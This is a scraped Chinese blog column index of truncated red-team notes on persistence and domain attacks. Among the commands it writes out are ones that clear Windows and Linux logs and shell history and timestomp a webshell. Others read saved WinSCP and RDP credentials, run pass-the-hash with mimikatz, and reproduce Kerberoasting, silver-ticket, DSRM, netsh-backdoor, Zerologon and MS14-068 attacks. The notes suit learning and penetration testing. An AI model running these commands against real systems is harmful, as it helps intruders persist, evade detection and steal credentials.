![](https://img-blog.csdnimg.cn/20201014180756918.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
权限维持
文章平均质量分 62
权限维持
whojoe
一个想学reverse的web狗
展开
-
文件夹的x权限
文件夹的x权限前言kali2021macos参考前言前几天遇到一个问题,文件夹也有x权限,这个x权限是干什么的kali2021uname -amkdir testchmod 644 testcd testls testmacos参考https://www.cnblogs.com/yiyide266/p/9998475.html...原创 2021-10-20 11:56:57 · 282 阅读 · 0 评论 -
windows痕迹清除
windows痕迹清除参考文章wevtutil参考文章https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/wevtutilhttps://www.freebuf.com/articles/system/266458.htmlwevtutilwevtutil el #列出系统中所有日志名称wevtutil cl system #清理系统日志wevtutil原创 2021-10-13 17:31:53 · 139 阅读 · 0 评论 -
linux痕迹清除
linux痕迹清除linux痕迹清除ssh登录不被w last命令监测到清除history记录清除系统日志linux痕迹清除ssh登录不被w last命令监测到ssh -T root@192.0.0.1 /bin/bash -i清除history记录history -r清除系统日志echo >/var/log/btmp # 清除登录失败日志echo >/var/log/lastlog # 清除最后一次登录时间日志echo >/var/log/wtmp # 清除用户登录原创 2021-10-11 18:29:33 · 397 阅读 · 0 评论 -
linux权限维持
修改属性文件时间touch -r index.php shell.phptouch -t 202010101010 shell.php#touch --help历史操作命令histroy -r #删除当前会话历史记录history -c #删除内存中的所有命令历史rm .bash_history #删除历史文件中的内容sed -i '150,$d' .bash_history#只保留前150行set +o history#针对你的工作关闭历史记录set -o history#恢复e原创 2021-10-08 22:27:54 · 426 阅读 · 0 评论 -
利用netsh实现后门
利用netsh实现后门项目地址利用参考文章项目地址https://github.com/outflanknl/NetshHelperBeacon这个的逻辑其实就是一个加载器,启动一个线程,执行操作,在进程里面申请空间,之后写入shellcode,执行利用编译好之后需要配置shellcode和版本,需要看一下目标系统的netsh的版本,是64位(PE后面L是32位,d是64位)所以需要修改shellcode位数为64执行netsh add helper C:\test\NetshHe原创 2021-08-18 11:25:09 · 240 阅读 · 0 评论 -
非约束委派账户配合printerbug域内提权
非约束委派账户配合printerbug域内提权环境搭建配置非约束委派漏洞复现本地远程环境搭建主机机器名ip用户版本域控ad.test.com192.168.164.147administratorwin2012r2域内机器user.test.com192.168.164.129user1win2008r2配置非约束委派漏洞复现本地https://github.com/leechristensen/SpoolSample/.https://原创 2021-07-16 16:42:05 · 825 阅读 · 1 评论 -
CVE-2020-1472域内提权漏洞复现
CVE-2020-1472域内提权漏洞复现环境漏洞复现mimikatz查看原本hashpoc重置密码获取密码恢复密码查看恢复的密码python重置密码获取域管密码1获取域控机器密码1获取域控机器密码2恢复域控密码查看恢复的密码参考文章环境ad 192.168.164.129user 192.168.164.133kali 192.168.164.x漏洞复现mimikatz查看原本hashmimikatz.exe "privilege::debug" "sekurlsa::logonpassw原创 2021-07-08 15:47:11 · 693 阅读 · 0 评论 -
SPN(Service Principal Names)
SPN(Service Principal Names)SPN注册SPNSPN查询setspn.exePowerShell-AD-ReconGetUserSPNSPowerView.ps1利用参考文章SPN服务主体名称(Service Principal Names)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例,则每个实例都必须具有自己的SPN。SPN分为两种原创 2021-05-24 16:35:28 · 2214 阅读 · 0 评论 -
域渗透-Kerberoasting Attack
域渗透-Kerberoasting Attack一、概述二、Kerberoasting攻击流程三、请求服务票据PowershellmimikatzGetUserSPNs查看票据是否申请成功klistMimikatzMSFRiskySPN导出票据mimikatzkerberoastGet-TGSCipher破解票据重写服务票据&RAM注入后门利用参考文章一、概述黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与S原创 2021-05-28 14:00:43 · 561 阅读 · 0 评论 -
域权限维持-银票
域权限维持-银票前提白银票据伪造利用1.在注入目标的Windows File Share(cifs)访问票据后,可以访问目标计算机上的任何共享,包括c $共享,能够将文件拷贝到目标系统上2.注入目标Scheduled Tasks服务(host)访问票据后,可以在目标机器上创建计划任务3.在注入http和wsman服务后,可以获得目标系统上的WinRM和Powershell远程管理的权限,验证失败4.在注入ldap服务票据后,可以获得目标系统上LDAP服务的管理权限,进而可以利用dcsync远程导出域控上的h原创 2021-05-19 14:57:10 · 225 阅读 · 0 评论 -
域权限维持-DSRM
域权限维持-DSRM简介更改DSRM密码的方式通过明文指定通过域账户同步DSRM利用使用DSRM账户连接的前提使用psexec或者wmiexec进行链接参考文章简介除了krbtgt服务帐号外,域控上还有个可利用的账户:目录服务还原模式(DSRM)账户,这个密码是在DC安装的时候设置的,所以一般不会被修改。但是微软对DSRM帐号进行了限制,只允许在控制台登录。可以通过修改注册表的方式,将如下注册表键值: HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdmin原创 2021-05-17 20:59:30 · 518 阅读 · 0 评论 -
rdp劫持学习
rdp劫持学习rdp服务确认启动通过注册表查询通过进程查看启动rdp中间人攻击登录shift后门结合rdp劫持多用户登录手动设置rdpwrap参考文章rdp服务确认启动通过注册表查询REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\C原创 2021-05-13 14:35:19 · 764 阅读 · 2 评论 -
使用Responder获取ntlmv2 hash
使用Responder获取ntlmv2 hashResponder配置下载获取ntlmv2hash之后进行爆破获取ntlmv2使用hashcat爆破密码中继获得shell参考文章Responder配置下载https://github.com/lgandx/ResponderResponder工具可以污染LLMNR和NBT-NS请求。在目录下的Responder.conf可以配置启用的模块如果只需要获取ntlmv2hash使用默认配置即可,之后使用Hashcat进行暴力破解如果要使用ntlm中原创 2021-03-03 17:52:53 · 1331 阅读 · 1 评论 -
读取winscp保存的密码
读取winscp保存的密码通过注册表查询脚本使用方法参考文章通过注册表查询reg query "HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions" /s脚本# coding=utf-8import randomimport sys,osPWALG_SIMPLE = 1PWALG_SIMPLE_MAGIC = 0xA3PWALG_SIMPLE_STRING = '0123456789ABCDEF'PWALG_SIM原创 2021-02-19 23:52:05 · 1492 阅读 · 0 评论 -
读取mstsc历史密码
读取mstsc历史密码通过注册表查看历史记录通过本地Credentials读取记录使用mimikatz读取密码(需要保存过凭证的才可以)通过注册表查看历史记录reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server Client\Servers" /s通过本地Credentials读取记录dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*使用mimikat原创 2021-02-19 23:33:49 · 5086 阅读 · 0 评论 -
pth常用工具
pth常用工具实现rdpPTHCrackMapExec实现rdpwindowsprivilege::debugsekurlsa::pth /user:administrator /domain:remoteserver /ntlm:d25ecd13fddbb542d2e16da4f9e0333d "/run:mstsc.exe /restrictedadmin"kalixfreerdp /u:administrator /pth:d25ecd13fddbb542d2e16da4f9e0333d原创 2021-01-21 13:31:06 · 851 阅读 · 0 评论 -
ssh代理的解释
ssh的三种代理用法SSH 命令的三种代理功能(-L/-R/-D)正向代理反向代理ssh socks 代理(端口转发)SSH 命令的三种代理功能(-L/-R/-D)ssh 命令除了登陆外还有三种代理功能:可以说是ssh可以用来端口转发正向代理(-L):相当于 iptable 的 port forwarding反向代理(-R):相当于 frp 或者 ngrokssh socks代理(-D...原创 2020-05-02 18:48:30 · 869 阅读 · 0 评论 -
ms14-068漏洞复现
ms14-068漏洞复现MS14-068域提权漏洞复现一、漏洞说明 改漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。 微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068二、漏洞原理 Kerberos认...原创 2020-04-12 13:32:54 · 946 阅读 · 0 评论